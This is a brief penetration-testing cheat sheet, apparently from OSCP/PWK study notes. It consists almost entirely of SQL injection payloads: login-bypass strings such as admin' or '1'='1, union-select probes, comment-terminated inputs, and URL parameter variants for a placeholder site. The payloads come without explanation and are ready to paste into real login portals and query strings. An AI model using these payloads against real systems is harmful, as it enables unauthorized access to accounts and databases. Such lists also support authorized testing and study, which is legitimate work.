SQL Injection (SQLi)

Quick-Hitters

admin' or '1'='1
" or ""="
' or 1=1 -- -
' union select 1,2,3 -- -
admin'-- -
' or "-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or 1=1 or "='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*

URL Parameters

For https://site.com/?q=HERE

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'   <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

PreviousCross-Site Scripting (XXS)NextOSCP / PWK - Random Tips and Tricks

Last updated 1 month ago

Quick-Hitters

Login Portals

URL Parameters